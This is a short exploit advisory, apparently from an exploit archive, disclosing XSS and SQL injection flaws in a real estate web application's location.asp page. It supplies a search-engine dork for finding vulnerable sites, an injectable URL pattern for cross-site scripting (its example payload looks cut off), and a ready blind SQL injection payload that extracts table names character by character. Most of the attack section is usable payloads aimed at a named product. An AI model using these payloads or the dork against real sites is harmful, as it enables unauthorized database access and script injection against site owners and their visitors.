--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities +==-- --==+====================================================================================+==-- - dreaming of necessity is reason to comply - [+] Info: [~] Bug found by JosS [~] sys-project[at]hotmail.com [~] http://www.spanish-hackers.com [~] EspSeC & Hack0wn!. [~] Software: Real Estate Web Site 1.0 [~] HomePage: http://www.real-estate-website.org/ [~] Exploit: Multiple Remote Vulnerabilities [High] [~] Dork: "powered by real-estate-website" [+] Cross Site Scripting: [~] Vuln file: location.asp [~] Exploit: http://localhost/PATH/location.asp?name=[XSS] [~] Example: http://localhost/PATH/location.asp?name="> [+] Remote SQL Injection: [~] Vuln file: location.asp [~] Exploit: http://localhost/PATH/location.asp?name=JosS&location=[SQL] [~] Example: IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00 --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End] # milw0rm.com [2008-06-09]